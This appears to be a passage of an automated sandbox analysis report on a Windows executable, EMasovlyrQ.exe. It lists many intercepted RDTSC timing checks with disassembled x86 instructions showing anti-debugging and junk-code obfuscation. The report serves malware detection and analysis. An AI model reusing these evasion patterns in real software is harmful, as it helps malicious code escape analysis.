Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113AE6E second address: 113AE73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113B900 second address: 113B973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 ja 00007F7C49018ED6h 0x0000000e pop edx 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F7C49018ED8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov esi, dword ptr [ebp+122D19DEh] 0x00000033 mov si, 5CD3h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F7C49018ED8h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 stc 0x00000054 push 00000000h 0x00000056 mov esi, 46C26BDEh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113B973 second address: 113B977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113B977 second address: 113B97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113B97B second address: 113B981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1141279 second address: 114127F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1142262 second address: 1142266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 114318F second address: 1143193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 114509B second address: 1145134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D39EBh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F7C48CABF18h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2251h], esi 0x00000033 jmp 00007F7C48CABF1Eh 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007F7C48CABF18h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 sbb edi, 7AD42B62h 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F7C48CABF28h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1146073 second address: 114608C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7C49018EDDh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1146150 second address: 1146154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11471CC second address: 11471E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11481F9 second address: 11481FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11481FD second address: 1148201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1148201 second address: 1148207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11483CE second address: 11483D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1148489 second address: 114848D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 114848D second address: 1148496 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 114A3B8 second address: 114A3BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 114B40C second address: 114B41A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F7C49018ED6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 114B41A second address: 114B46A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+1245ECB7h] 0x00000010 mov ebx, 5DAC47DBh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F7C48CABF18h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 jne 00007F7C48CABF1Ah 0x00000037 push 00000000h 0x00000039 or ebx, dword ptr [ebp+122D289Bh] 0x0000003f xchg eax, esi 0x00000040 push ecx 0x00000041 jng 00007F7C48CABF1Ch 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 10FBEBA second address: 10FBEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11494E7 second address: 1149505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F7C48CABF16h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11500A5 second address: 11500AF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7C49018ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11500AF second address: 1150140 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7C48CABF18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F7C48CABF18h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F7C48CABF18h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 or edi, 74BFF385h 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push esi 0x0000004c call 00007F7C48CABF18h 0x00000051 pop esi 0x00000052 mov dword ptr [esp+04h], esi 0x00000056 add dword ptr [esp+04h], 0000001Dh 0x0000005e inc esi 0x0000005f push esi 0x00000060 ret 0x00000061 pop esi 0x00000062 ret 0x00000063 mov edi, eax 0x00000065 xchg eax, esi 0x00000066 pushad 0x00000067 pushad 0x00000068 jmp 00007F7C48CABF1Fh 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1150140 second address: 1150176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7C49018EE2h 0x0000000b jmp 00007F7C49018EE3h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1151167 second address: 1151186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7C48CABF25h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1151186 second address: 115118C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 10EE919 second address: 10EE921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1153716 second address: 115371A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 115371A second address: 1153748 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F7C48CABF29h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 je 00007F7C48CABF24h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11538CA second address: 11538D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11538D7 second address: 11538E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 115DBBB second address: 115DBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnc 00007F7C49018ED6h 0x0000000e popad 0x0000000f jmp 00007F7C49018EE7h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 115D349 second address: 115D34F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 115D34F second address: 115D355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 115D4C2 second address: 115D4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jmp 00007F7C48CABF1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 115D4D9 second address: 115D4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jng 00007F7C49018ED6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1161440 second address: 1161445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1161445 second address: 1161454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1161454 second address: 1161468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F7C48CABF18h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1161468 second address: 116146E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11628CB second address: 11628E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C48CABF25h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116894B second address: 1168955 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7C49018ED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1168ACC second address: 1168AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1168AD0 second address: 1168AF2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F7C49018EECh 0x0000000c jmp 00007F7C49018EE0h 0x00000011 je 00007F7C49018ED6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1169200 second address: 116920B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116ABF0 second address: 116ABF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116ABF6 second address: 116ABFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113ECDD second address: 113ECE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113ECE1 second address: 113ECE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113ECE7 second address: 113ECED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113ECED second address: 113ECF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113F25B second address: F8DB1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+1246EA20h], ecx 0x00000012 push dword ptr [ebp+122D01E9h] 0x00000018 xor dword ptr [ebp+122D3952h], ebx 0x0000001e call dword ptr [ebp+122D397Fh] 0x00000024 pushad 0x00000025 pushad 0x00000026 jmp 00007F7C49018EE5h 0x0000002b jmp 00007F7C49018EDDh 0x00000030 popad 0x00000031 xor eax, eax 0x00000033 mov dword ptr [ebp+122D395Dh], edx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d jg 00007F7C49018EDCh 0x00000043 mov dword ptr [ebp+122D1BB4h], edi 0x00000049 jp 00007F7C49018EE2h 0x0000004f mov dword ptr [ebp+122D2B17h], eax 0x00000055 jmp 00007F7C49018EE0h 0x0000005a cld 0x0000005b mov esi, 0000003Ch 0x00000060 jng 00007F7C49018EDDh 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a cmc 0x0000006b lodsw 0x0000006d pushad 0x0000006e call 00007F7C49018EE9h 0x00000073 mov si, bx 0x00000076 pop ebx 0x00000077 xor dword ptr [ebp+122D17F1h], esi 0x0000007d popad 0x0000007e add eax, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D38BDh], edx 0x00000088 mov ebx, dword ptr [esp+24h] 0x0000008c sub dword ptr [ebp+122D38BDh], edi 0x00000092 js 00007F7C49018EDCh 0x00000098 push eax 0x00000099 push eax 0x0000009a push edx 0x0000009b jnc 00007F7C49018ED8h 0x000000a1 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113F311 second address: 113F317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113F44A second address: 113F44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113F44E second address: 113F46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], esi 0x0000000a mov dl, 28h 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f ja 00007F7C48CABF16h 0x00000015 jnp 00007F7C48CABF16h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113F71A second address: 113F728 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116ED00 second address: 116ED2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7C48CABF26h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7C48CABF1Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116ED2D second address: 116ED32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116ED32 second address: 116ED38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116EFE0 second address: 116EFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116EFE6 second address: 116EFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F2C0 second address: 116F2CC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7C49018ED6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F2CC second address: 116F2DF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F7C48CABF16h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F2DF second address: 116F2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C49018EE4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F2F9 second address: 116F2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F2FF second address: 116F312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7C49018EDEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F312 second address: 116F317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F317 second address: 116F32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7C49018ED6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F7C49018ED6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F5F5 second address: 116F5F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F5F9 second address: 116F603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F724 second address: 116F72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7C48CABF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F72E second address: 116F759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F7C49018EDEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F759 second address: 116F75F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 116F75F second address: 116F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1173181 second address: 1173185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1173185 second address: 11731B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F7C49018EEDh 0x0000000e jmp 00007F7C49018EE7h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11731B0 second address: 11731B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1178A45 second address: 1178A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
